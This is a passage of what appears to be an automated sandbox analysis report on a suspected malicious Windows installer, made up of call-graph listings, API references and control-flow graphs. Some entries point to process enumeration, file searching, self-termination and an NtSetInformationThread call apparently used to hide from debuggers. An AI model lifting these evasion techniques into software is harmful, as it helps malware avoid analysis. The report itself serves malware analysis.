6ca79c46 63384 6ca79cd0 63370->63384 63375 6ca79d92 63376 6ca79eb1 63375->63376 63408 6ca79f34 63376->63408 63379 6ca6ebec 63382 6ca6ec15 LeaveCriticalSection 63379->63382 63381->63351 63382->63351 63383->63370 63390 6ca79cf3 63384->63390 63385 6ca79c53 63398 6ca79c8c 63385->63398 63386 6ca79d4b 63403 6ca76005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63386->63403 63388 6ca79d54 63404 6ca735db HeapFree GetLastError _free 63388->63404 63390->63385 63390->63386 63401 6ca6b3c9 EnterCriticalSection 63390->63401 63402 6ca6b3dd LeaveCriticalSection 63390->63402 63392 6ca79d5d 63392->63385 63405 6ca75a3f 6 API calls std::_Lockit::_Lockit 63392->63405 63394 6ca79d7c 63406 6ca6b3c9 EnterCriticalSection 63394->63406 63397 6ca79d8f 63397->63385 63407 6ca6f1d6 LeaveCriticalSection 63398->63407 63400 6ca6ebc3 63400->63351 63400->63375 63401->63390 63402->63390 63403->63388 63404->63392 63405->63394 63406->63397 63407->63400 63409 6ca79f53 63408->63409 63410 6ca79f66 63409->63410 63414 6ca79f7b 63409->63414 63424 6ca6ef40 18 API calls __Getctype 63410->63424 63412 6ca79ec7 63412->63379 63421 6ca82dfe 63412->63421 63419 6ca7a09b 63414->63419 63425 6ca82cc8 37 API calls __Getctype 63414->63425 63416 6ca7a0eb 63416->63419 63426 6ca82cc8 37 API calls __Getctype 63416->63426 63418 6ca7a109 63418->63419 63427 6ca82cc8 37 API calls __Getctype 63418->63427 63419->63412 63428 6ca6ef40 18 API calls __Getctype 63419->63428 63429 6ca831b6 63421->63429 63424->63412 63425->63416 63426->63418 63427->63419 63428->63412 63431 6ca831c2 __wsopen_s 63429->63431 63430 6ca831c9 63447 6ca6ef40 18 API calls __Getctype 63430->63447 63431->63430 63432 6ca831f4 63431->63432 63438 6ca82e1e 63432->63438 63437 6ca82e19 63437->63379 63449 6ca6f4eb 63438->63449 63443 6ca82e54 63445 6ca82e86 63443->63445 63489 6ca735db HeapFree GetLastError _free 63443->63489 63448 6ca8324b LeaveCriticalSection __wsopen_s 63445->63448 63447->63437 63448->63437 63490 6ca6ab0b 
63449->63490 63452 6ca6f50f 63454 6ca6ac16 63452->63454 63499 6ca6ac6e 63454->63499 63456 6ca6ac2e 63456->63443 63457 6ca82e8c 63456->63457 63514 6ca8330c 63457->63514 63463 6ca82fb2 GetFileType 63466 6ca82fbd GetLastError 63463->63466 63467 6ca83004 63463->63467 63464 6ca82ebe __dosmaperr 63464->63443 63465 6ca82f87 GetLastError 63465->63464 63543 6ca6e812 __dosmaperr _free 63466->63543 63544 6ca805d0 SetStdHandle __dosmaperr __wsopen_s 63467->63544 63468 6ca82f35 63468->63463 63468->63465 63542 6ca83277 CreateFileW 63468->63542 63470 6ca82fcb CloseHandle 63470->63464 63486 6ca82ff4 63470->63486 63473 6ca82f7a 63473->63463 63473->63465 63474 6ca83025 63475 6ca83071 63474->63475 63545 6ca83486 70 API calls 2 library calls 63474->63545 63479 6ca83078 63475->63479 63559 6ca83530 70 API calls 2 library calls 63475->63559 63478 6ca830a6 63478->63479 63480 6ca830b4 63478->63480 63546 6ca7a745 63479->63546 63480->63464 63482 6ca83130 CloseHandle 63480->63482 63560 6ca83277 CreateFileW 63482->63560 63484 6ca8315b 63485 6ca83165 GetLastError 63484->63485 63484->63486 63487 6ca83171 __dosmaperr 63485->63487 63486->63464 63561 6ca8053f SetStdHandle __dosmaperr __wsopen_s 63487->63561 63489->63445 63491 6ca6ab22 63490->63491 63492 6ca6ab2b 63490->63492 63491->63452 63498 6ca757f5 5 API calls std::_Lockit::_Lockit 63491->63498 63492->63491 63493 6ca737d2 __Getctype 37 API calls 63492->63493 63494 6ca6ab4b 63493->63494 63495 6ca73d48 __Getctype 37 API calls 63494->63495 63496 6ca6ab61 63495->63496 63497 6ca73d75 __fassign 37 API calls 63496->63497 63497->63491 63498->63452 63500 6ca6ac96 63499->63500 63501 6ca6ac7c 63499->63501 63502 6ca6acbc 63500->63502 63503 6ca6ac9d 63500->63503 63504 6ca6abfc __wsopen_s HeapFree GetLastError 63501->63504 63505 6ca73663 __fassign MultiByteToWideChar 63502->63505 63506 6ca6abbd __wsopen_s HeapFree GetLastError 63503->63506 63507 6ca6ac86 __dosmaperr 63503->63507 63504->63507 63509 6ca6accb 63505->63509 63506->63507 63507->63456 63508 
6ca6acd2 GetLastError 63508->63507 63509->63508 63510 6ca6acf8 63509->63510 63511 6ca6abbd __wsopen_s HeapFree GetLastError 63509->63511 63510->63507 63512 6ca73663 __fassign MultiByteToWideChar 63510->63512 63511->63510 63513 6ca6ad0f 63512->63513 63513->63507 63513->63508 63515 6ca83347 63514->63515 63517 6ca8332d 63514->63517 63516 6ca8329c __wsopen_s 18 API calls 63515->63516 63521 6ca8337f 63516->63521 63517->63515 63518 6ca6ef40 __Getctype 18 API calls 63517->63518 63518->63515 63519 6ca833ae 63520 6ca84731 __wsopen_s 18 API calls 63519->63520 63526 6ca82ea9 63519->63526 63522 6ca833fc 63520->63522 63521->63519 63524 6ca6ef40 __Getctype 18 API calls 63521->63524 63523 6ca83479 63522->63523 63522->63526 63525 6ca6ef6d __Getctype 11 API calls 63523->63525 63524->63519 63527 6ca83485 63525->63527 63526->63464 63528 6ca8042c 63526->63528 63529 6ca80438 __wsopen_s 63528->63529 63530 6ca6f1bf std::_Lockit::_Lockit EnterCriticalSection 63529->63530 63531 6ca8043f 63530->63531 63533 6ca80464 63531->63533 63537 6ca804d3 EnterCriticalSection 63531->63537 63539 6ca80486 63531->63539 63532 6ca80536 __wsopen_s LeaveCriticalSection 63534 6ca804a6 63532->63534 63535 6ca80662 __wsopen_s 11 API calls 63533->63535 63534->63464 63541 6ca83277 CreateFileW 63534->63541 63536 6ca80469 63535->63536 63536->63539 63540 6ca807b0 __wsopen_s EnterCriticalSection 63536->63540 63538 6ca804e0 LeaveCriticalSection 63537->63538 63537->63539 63538->63531 63539->63532 63540->63539 63541->63468 63542->63473 63543->63470 63544->63474 63545->63475 63547 6ca803c2 __wsopen_s 18 API calls 63546->63547 63549 6ca7a755 63547->63549 63548 6ca7a75b 63551 6ca8053f __wsopen_s SetStdHandle 63548->63551 63549->63548 63550 6ca7a78d 63549->63550 63552 6ca803c2 __wsopen_s 18 API calls 63549->63552 63550->63548 63553 6ca803c2 __wsopen_s 18 API calls 63550->63553 63558 6ca7a7b3 __dosmaperr 63551->63558 63554 6ca7a784 63552->63554 63555 6ca7a799 CloseHandle 63553->63555 63556 6ca803c2 __wsopen_s 18 API calls 
63554->63556 63555->63548 63557 6ca7a7a5 GetLastError 63555->63557 63556->63550 63557->63548 63558->63464 63559->63478 63560->63484 63561->63486 63562->63361 63564 6ca6f9de 63563->63564 63565 6ca6f9c9 63563->63565 63569 6ca6f9d9 63564->63569 63579 6ca6fad9 63564->63579 63601 6ca6ef40 18 API calls __Getctype 63565->63601 63569->63364 63573 6ca6fa01 63594 6ca7a6b8 63573->63594 63575 6ca6fa07 63575->63569 63602 6ca735db HeapFree GetLastError _free 63575->63602 63577->63365 63578->63365 63580 6ca6faf1 63579->63580 63584 6ca6f9f3 63579->63584 63581 6ca78a80 18 API calls 63580->63581 63580->63584 63582 6ca6fb0f 63581->63582 63603 6ca7a98c 63582->63603 63585 6ca7755e 63584->63585 63586 6ca77575 63585->63586 63587 6ca6f9fb 63585->63587 63586->63587 63659 6ca735db HeapFree GetLastError _free 63586->63659 63589 6ca78a80 63587->63589 63590 6ca78aa1 63589->63590 63591 6ca78a8c 63589->63591 63590->63573 63660 6ca6ef40 18 API calls __Getctype 63591->63660 63593 6ca78a9c 63593->63573 63595 6ca7a6de 63594->63595 63599 6ca7a6c9 __dosmaperr 63594->63599 63596 6ca7a705 63595->63596 63598 6ca7a727 __dosmaperr 63595->63598 63661 6ca7a7e1 63596->63661 63669 6ca6ef40 18 API calls __Getctype 63598->63669 63599->63575 63601->63569 63602->63569 63604 6ca7a998 __wsopen_s 63603->63604 63605 6ca7a9a0 __dosmaperr 63604->63605 63606 6ca7a9ea 63604->63606 63607 6ca7aa53 __dosmaperr 63604->63607 63605->63584 63614 6ca807b0 EnterCriticalSection 63606->63614 63644 6ca6ef40 18 API calls __Getctype 63607->63644 63609 6ca7a9f0 63612 6ca7aa0c __dosmaperr 63609->63612 63615 6ca7aa7e 63609->63615 63643 6ca7aa4b LeaveCriticalSection __wsopen_s 63612->63643 63614->63609 63616 6ca7aaa0 63615->63616 63642 6ca7aabc __dosmaperr 63615->63642 63617 6ca7aaf4 63616->63617 63618 6ca7aaa4 __dosmaperr 63616->63618 63619 6ca7ab07 63617->63619 63653 6ca79a89 20 API calls __wsopen_s 63617->63653 63652 6ca6ef40 18 API calls __Getctype 63618->63652 63645 6ca7ac60 63619->63645 63624 6ca7ab1d 63628 6ca7ab46 63624->63628 
63629 6ca7ab21 63624->63629 63625 6ca7ab5c 63626 6ca7abb5 WriteFile 63625->63626 63627 6ca7ab70 63625->63627 63630 6ca7abd9 GetLastError 63626->63630 63626->63642 63632 6ca7aba5 63627->63632 63633 6ca7ab7b 63627->63633 63655 6ca7acd1 43 API calls 5 library calls 63628->63655 63629->63642 63654 6ca7b07b 6 API calls __wsopen_s 63629->63654 63630->63642 63658 6ca7b0e3 7 API calls 2 library calls 63632->63658 63636 6ca7ab95 63633->63636 63637 6ca7ab80 63633->63637 63657 6ca7b2a7 8 API calls 3 library calls 63636->63657 63639 6ca7ab85 63637->63639 63637->63642 63638 6ca7ab93 63638->63642 63656 6ca7b1be 7 API calls 2 library calls 63639->63656 63642->63612 63643->63605 63644->63605 63646 6ca80805 __wsopen_s 18 API calls 63645->63646 63647 6ca7ac71 63646->63647 63648 6ca737d2 __Getctype 37 API calls 63647->63648 63651 6ca7ab18 63647->63651 63649 6ca7ac94 63648->63649 63650 6ca7acae GetConsoleMode 63649->63650 63649->63651 63650->63651 63651->63624 63651->63625 63652->63642 63653->63619 63654->63642 63655->63642 63656->63638 63657->63638 63658->63638 63659->63587 63660->63593 63662 6ca7a7ed __wsopen_s 63661->63662 63670 6ca807b0 EnterCriticalSection 63662->63670 63664 6ca7a7fb 63665 6ca7a745 __wsopen_s 21 API calls 63664->63665 63666 6ca7a828 63664->63666 63665->63666 63671 6ca7a861 LeaveCriticalSection __wsopen_s 63666->63671 63668 6ca7a84a 63668->63599 63669->63599 63670->63664 63671->63668 63672->63200 63673->63203 63674->63200 63675->63200 63676->63200 63678 6c93022e 63677->63678 63679 6c9070c4 63678->63679 63684 6ca705fb 63678->63684 63679->63211 63681->63214 63682->63216 63683->63218 63685 6ca70626 63684->63685 63686 6ca70609 63684->63686 63685->63678 63686->63685 63687 6ca70616 63686->63687 63688 6ca7062a 63686->63688 63700 6ca6ef40 18 API calls __Getctype 63687->63700 63692 6ca70822 63688->63692 63693 6ca7082e __wsopen_s 63692->63693 63701 6ca6b3c9 EnterCriticalSection 63693->63701 63695 6ca7083c 63702 6ca707df 63695->63702 63699 6ca7065c 63699->63678 63700->63685 
63701->63695 63710 6ca773c6 63702->63710 63708 6ca70819 63709 6ca70871 LeaveCriticalSection 63708->63709 63709->63699 63711 6ca78a80 18 API calls 63710->63711 63712 6ca773d7 63711->63712 63713 6ca80805 __wsopen_s 18 API calls 63712->63713 63715 6ca773dd __wsopen_s 63713->63715 63714 6ca707f3 63717 6ca7065e 63714->63717 63715->63714 63727 6ca735db HeapFree GetLastError _free 63715->63727 63719 6ca70670 63717->63719 63721 6ca7068e 63717->63721 63718 6ca7067e 63728 6ca6ef40 18 API calls __Getctype 63718->63728 63719->63718 63719->63721 63724 6ca706a6 _Yarn 63719->63724 63726 6ca77479 62 API calls 63721->63726 63722 6ca6fad9 62 API calls 63722->63724 63723 6ca78a80 18 API calls 63723->63724 63724->63721 63724->63722 63724->63723 63725 6ca7a98c __wsopen_s 62 API calls 63724->63725 63725->63724 63726->63708 63727->63714 63728->63721 63730 6ca64e45 63729->63730 63731 6c932020 52 API calls 63730->63731 63732 6ca64ee6 63731->63732 63733 6ca65863 std::_Facet_Register 4 API calls 63732->63733 63734 6ca64f1e 63733->63734 63735 6ca66147 43 API calls 63734->63735 63736 6ca64f32 63735->63736 63737 6c931d90 89 API calls 63736->63737 63739 6ca64fdb 63737->63739 63738 6ca6500c 63738->63229 63739->63738 63783 6c932250 30 API calls 63739->63783 63741 6ca65046 63784 6c9326e0 24 API calls 4 library calls 63741->63784 63743 6ca65058 63785 6ca68199 RaiseException 63743->63785 63745 6ca6506d 63786 6c92e010 67 API calls 63745->63786 63747 6ca6507f 63747->63229 63749 6ca651ad 63748->63749 63787 6ca653c0 63749->63787 63751 6ca6529c 63751->63237 63754 6ca651c5 63754->63751 63805 6c932250 30 API calls 63754->63805 63806 6c9326e0 24 API calls 4 library calls 63754->63806 63807 6ca68199 RaiseException 63754->63807 63757 6c9425cf 63756->63757 63760 6c9425e3 63757->63760 63816 6c933560 32 API calls std::_Xinvalid_argument 63757->63816 63763 6c94269e 63760->63763 63818 6c932250 30 API calls 63760->63818 63819 6c9326e0 24 API calls 4 library calls 63760->63819 63820 6ca68199 RaiseException 
63760->63820 63762 6c9426b1 63762->63237 63763->63762 63817 6c9337e0 32 API calls std::_Xinvalid_argument 63763->63817 63767 6ca649be 63766->63767 63771 6ca649f1 63766->63771 63769 6c9301f0 64 API calls 63767->63769 63768 6ca64aa3 63768->63241 63770 6ca649e4 63769->63770 63772 6ca6f938 67 API calls 63770->63772 63771->63768 63821 6c932250 30 API calls 63771->63821 63772->63771 63774 6ca64ace 63822 6c932340 24 API calls 63774->63822 63776 6ca64ade 63823 6ca68199 RaiseException 63776->63823 63778 6ca64ae9 63824 6c92e010 67 API calls 63778->63824 63780 6ca64b42 std::ios_base::_Ios_base_dtor 63780->63241 63781->63233 63782->63238 63783->63741 63784->63743 63785->63745 63786->63747 63788 6ca653fc 63787->63788 63789 6ca65428 63787->63789 63804 6ca65421 63788->63804 63810 6c932250 30 API calls 63788->63810 63794 6ca65439 63789->63794 63808 6c933560 32 API calls std::_Xinvalid_argument 63789->63808 63792 6ca65608 63811 6c932340 24 API calls 63792->63811 63794->63804 63809 6c932f60 42 API calls 4 library calls 63794->63809 63795 6ca65617 63812 6ca68199 RaiseException 63795->63812 63799 6ca65647 63814 6c932340 24 API calls 63799->63814 63801 6ca65473 63801->63804 63813 6c932250 30 API calls 63801->63813 63802 6ca6565d 63815 6ca68199 RaiseException 63802->63815 63804->63754 63805->63754 63806->63754 63807->63754 63808->63794 63809->63801 63810->63792 63811->63795 63812->63801 63813->63799 63814->63802 63815->63804 63816->63760 63817->63762 63818->63760 63819->63760 63820->63760 63821->63774 63822->63776 63823->63778 63824->63780 63825 6c8ff150 63827 6c8fefbe 63825->63827 63826 6c8ff243 CreateFileA 63829 6c8ff2a7 63826->63829 63827->63826 63828 6c9002ca 63829->63828 63830 6c9002ac GetCurrentProcess TerminateProcess 63829->63830 63830->63828
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _strlen
                        • String ID: HR^
                        • API String ID: 4218353326-1341859651
                        • Opcode ID: 70235d594594ad73a298df254d054b83657d0534635ae4bf59e45aaa3e246436
                        • Instruction ID: 9631912a7c2908255d85ebba82792f481df324d91b0c196c6c59e76f2684babb
                        • Opcode Fuzzy Hash: 70235d594594ad73a298df254d054b83657d0534635ae4bf59e45aaa3e246436
                        • Instruction Fuzzy Hash: 96740671644B068FC738CF28C9D0695B7F2EFD6318B198E2DC0A68BA55E774B54ACB40

                        Control-flow Graph

                        control_flow_graph 4725 6ca598b0-6ca598c2 4726 6ca598c4 4725->4726 4727 6ca598c6-6ca598f3 FindFirstFileA 4725->4727 4726->4727 4728 6ca5991c-6ca59925 4727->4728 4729 6ca59927-6ca5992c 4728->4729 4730 6ca59940-6ca59945 4728->4730 4731 6ca59900-6ca5991a 4729->4731 4732 6ca5992e-6ca59933 4729->4732 4733 6ca59947 4730->4733 4734 6ca59959-6ca5995e 4730->4734 4731->4728 4732->4728 4735 6ca59935-6ca59939 4732->4735 4736 6ca59949-6ca59957 4733->4736 4734->4728 4737 6ca59960-6ca5996c 4734->4737 4735->4736 4736->4728
                        APIs
                        • FindFirstFileA.KERNEL32(?,?), ref: 6CA598CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: FileFindFirst
                        • String ID: gF:E$hF:E$hF:E
                        • API String ID: 1974802433-4234190611
                        • Opcode ID: eefd53944415965fd5d8d981af6f0f530b51d98e863c2344586976a2f6fc6600
                        • Instruction ID: 0d4d1b0d069643cdccc38b8ede7ba3c39d4156c0331d9d61da76103883c64915
                        • Opcode Fuzzy Hash: eefd53944415965fd5d8d981af6f0f530b51d98e863c2344586976a2f6fc6600
                        • Instruction Fuzzy Hash: D9116DF4109341DFD7148E78D544A4ABBF0BB85314F988E49F4A8CB6A1E330CD99CB42

                        Control-flow Graph

                        control_flow_graph 4775 6ca64050-6ca64085 CreateToolhelp32Snapshot 4776 6ca640c0-6ca640c9 4775->4776 4777 6ca64110-6ca64115 4776->4777 4778 6ca640cb-6ca640d0 4776->4778 4781 6ca64087-6ca640b1 call 6ca71a25 4777->4781 4782 6ca6411b-6ca64120 4777->4782 4779 6ca640d2-6ca640d7 4778->4779 4780 6ca64148-6ca6414d 4778->4780 4783 6ca6417f-6ca64190 4779->4783 4784 6ca640dd-6ca640e2 4779->4784 4787 6ca6414f-6ca6417d call 6ca6a740 Process32FirstW 4780->4787 4788 6ca641bc-6ca641c1 4780->4788 4781->4776 4785 6ca64195-6ca641a2 Process32NextW 4782->4785 4786 6ca64122-6ca64127 4782->4786 4783->4776 4784->4776 4791 6ca640e4-6ca640ff CloseHandle 4784->4791 4794 6ca641a7-6ca641b7 4785->4794 4786->4776 4792 6ca64129-6ca64143 4786->4792 4787->4794 4788->4776 4790 6ca641c7-6ca641d5 4788->4790 4791->4776 4792->4776 4794->4776
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA6405E
                        • CloseHandle.KERNEL32(?), ref: 6CA640EC
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CloseCreateHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 3280610774-0
                        • Opcode ID: 507a10b6b662569f4b45c3cd85dc4a2ffb66d93c980c4aec3d4959fe09e2e86a
                        • Instruction ID: bbf8ceaeaac2cdb1132775d9adaa2e6f4392f8089042329c8717a8198a807ea2
                        • Opcode Fuzzy Hash: 507a10b6b662569f4b45c3cd85dc4a2ffb66d93c980c4aec3d4959fe09e2e86a
                        • Instruction Fuzzy Hash: D0315EB464C3009FD710DF66C89475ABBE4EB8A314F144A19F598C3BA0D339D884DB43

                        Control-flow Graph

                        control_flow_graph 4919 6c8e3886-6c8e388e 4920 6c8e3894-6c8e3896 4919->4920 4921 6c8e3970-6c8e397d 4919->4921 4920->4921 4924 6c8e389c-6c8e38b9 4920->4924 4922 6c8e397f-6c8e3989 4921->4922 4923 6c8e39f1-6c8e39f8 4921->4923 4922->4924 4925 6c8e398f-6c8e3994 4922->4925 4926 6c8e39fe-6c8e3a03 4923->4926 4927 6c8e3ab5-6c8e3aba 4923->4927 4928 6c8e38c0-6c8e38c1 4924->4928 4930 6c8e399a-6c8e399f 4925->4930 4931 6c8e3b16-6c8e3b18 4925->4931 4932 6c8e3a09-6c8e3a2f 4926->4932 4933 6c8e38d2-6c8e38d4 4926->4933 4927->4924 4929 6c8e3ac0-6c8e3ac7 4927->4929 4934 6c8e395e 4928->4934 4929->4928 4936 6c8e3acd-6c8e3ad6 4929->4936 4937 6c8e383b-6c8e3855 call 6ca318a0 call 6ca318b0 4930->4937 4938 6c8e39a5-6c8e39bf 4930->4938 4931->4928 4939 6c8e38f8-6c8e3955 4932->4939 4940 6c8e3a35-6c8e3a3a 4932->4940 4941 6c8e3957-6c8e395c 4933->4941 4935 6c8e3960-6c8e3964 4934->4935 4943 6c8e396a 4935->4943 4944 6c8e3860-6c8e3885 4935->4944 4936->4931 4945 6c8e3ad8-6c8e3aeb 4936->4945 4937->4944 4946 6c8e3a5a-6c8e3a5d 4938->4946 4939->4941 4947 6c8e3b1d-6c8e3b22 4940->4947 4948 6c8e3a40-6c8e3a57 4940->4948 4941->4934 4950 6c8e3ba1-6c8e3bb6 4943->4950 4944->4919 4945->4939 4951 6c8e3af1-6c8e3af8 4945->4951 4955 6c8e3aa9-6c8e3ab0 4946->4955 4953 6c8e3b49-6c8e3b50 4947->4953 4954 6c8e3b24-6c8e3b44 4947->4954 4948->4946 4962 6c8e3bc0-6c8e3bda call 6ca318a0 call 6ca318b0 4950->4962 4957 6c8e3afa-6c8e3aff 4951->4957 4958 6c8e3b62-6c8e3b85 4951->4958 4953->4928 4961 6c8e3b56-6c8e3b5d 4953->4961 4954->4955 4955->4935 4957->4941 4958->4939 4966 6c8e3b8b 4958->4966 4961->4935 4970 6c8e3be0-6c8e3bfe 4962->4970 4966->4950 4973 6c8e3e7b 4970->4973 4974 6c8e3c04-6c8e3c11 4970->4974 4975 6c8e3e81-6c8e3ee0 call 6c8e3750 GetCurrentThread NtSetInformationThread 4973->4975 4976 6c8e3c17-6c8e3c20 4974->4976 4977 6c8e3ce0-6c8e3cea 4974->4977 4991 6c8e3eea-6c8e3f04 call 6ca318a0 call 6ca318b0 4975->4991 4979 6c8e3c26-6c8e3c2d 4976->4979 4980 6c8e3dc5 4976->4980 4981 6c8e3cec-6c8e3d0c 4977->4981 
4982 6c8e3d3a-6c8e3d3c 4977->4982 4987 6c8e3dc3 4979->4987 4988 6c8e3c33-6c8e3c3a 4979->4988 4986 6c8e3dc6 4980->4986 4989 6c8e3d90-6c8e3d95 4981->4989 4983 6c8e3d3e-6c8e3d45 4982->4983 4984 6c8e3d70-6c8e3d8d 4982->4984 4990 6c8e3d50-6c8e3d57 4983->4990 4984->4989 4996 6c8e3dc8-6c8e3dcc 4986->4996 4987->4980 4994 6c8e3e26-6c8e3e2b 4988->4994 4995 6c8e3c40-6c8e3c5b 4988->4995 4992 6c8e3dba-6c8e3dc1 4989->4992 4993 6c8e3d97-6c8e3db8 4989->4993 4990->4986 5013 6c8e3f75-6c8e3fa1 4991->5013 4992->4987 4998 6c8e3dd7-6c8e3ddc 4992->4998 4993->4980 4999 6c8e3c7b-6c8e3cd0 4994->4999 5000 6c8e3e31 4994->5000 5001 6c8e3e1b-6c8e3e24 4995->5001 4996->4970 5002 6c8e3dd2 4996->5002 5005 6c8e3dde-6c8e3e17 4998->5005 5006 6c8e3e36-6c8e3e3d 4998->5006 4999->4990 5000->4962 5001->4996 5003 6c8e3e76-6c8e3e79 5001->5003 5002->5003 5003->4975 5005->5001 5009 6c8e3e3f-6c8e3e5a 5006->5009 5010 6c8e3e5c-6c8e3e5f 5006->5010 5009->5001 5010->4999 5011 6c8e3e65-6c8e3e69 5010->5011 5011->4996 5011->5003 5017 6c8e3fa3-6c8e3fa8 5013->5017 5018 6c8e4020-6c8e4026 5013->5018 5021 6c8e3fae-6c8e3fcf 5017->5021 5022 6c8e407c-6c8e4081 5017->5022 5019 6c8e402c-6c8e403c 5018->5019 5020 6c8e3f06-6c8e3f35 5018->5020 5025 6c8e403e-6c8e4058 5019->5025 5026 6c8e40b3-6c8e40b8 5019->5026 5024 6c8e3f38-6c8e3f61 5020->5024 5023 6c8e40aa-6c8e40ae 5021->5023 5022->5023 5027 6c8e4083-6c8e408a 5022->5027 5028 6c8e3f6b-6c8e3f6f 5023->5028 5029 6c8e3f64-6c8e3f67 5024->5029 5030 6c8e405a-6c8e4063 5025->5030 5026->5021 5032 6c8e40be-6c8e40c9 5026->5032 5027->5024 5031 6c8e4090 5027->5031 5028->5013 5034 6c8e3f69 5029->5034 5035 6c8e4069-6c8e406c 5030->5035 5036 6c8e40f5-6c8e413f 5030->5036 5031->4991 5037 6c8e40a7 5031->5037 5032->5023 5033 6c8e40cb-6c8e40d4 5032->5033 5033->5037 5038 6c8e40d6-6c8e40f0 5033->5038 5034->5028 5040 6c8e4144-6c8e414b 5035->5040 5041 6c8e4072-6c8e4077 5035->5041 5036->5034 5037->5023 5038->5030 5040->5028 5041->5029
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1b4de46a3ff3d18cc44b4ebc491aba9cd0fe1ec4f08857f92ac5f81b1163748
                        • Instruction ID: a0cb5846d0b672def97a661457d4aba508d96f1b6c749f7b6a34febe9c0e192d
                        • Opcode Fuzzy Hash: b1b4de46a3ff3d18cc44b4ebc491aba9cd0fe1ec4f08857f92ac5f81b1163748
                        • Instruction Fuzzy Hash: 3C32D432245B018FC334CF28C9D0695B7E3EFDA3147698E6CC0AA5BA65D775B84ACB50
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 27e05e697439aea44b8f0d9db73c416200fa61c6b67fe42c2ad4a1a33378a5e0
                        • Instruction ID: d3c61a45ede113231b6829f7b0d504ac50830a681b93a1c9ef643d98ee5e58b9
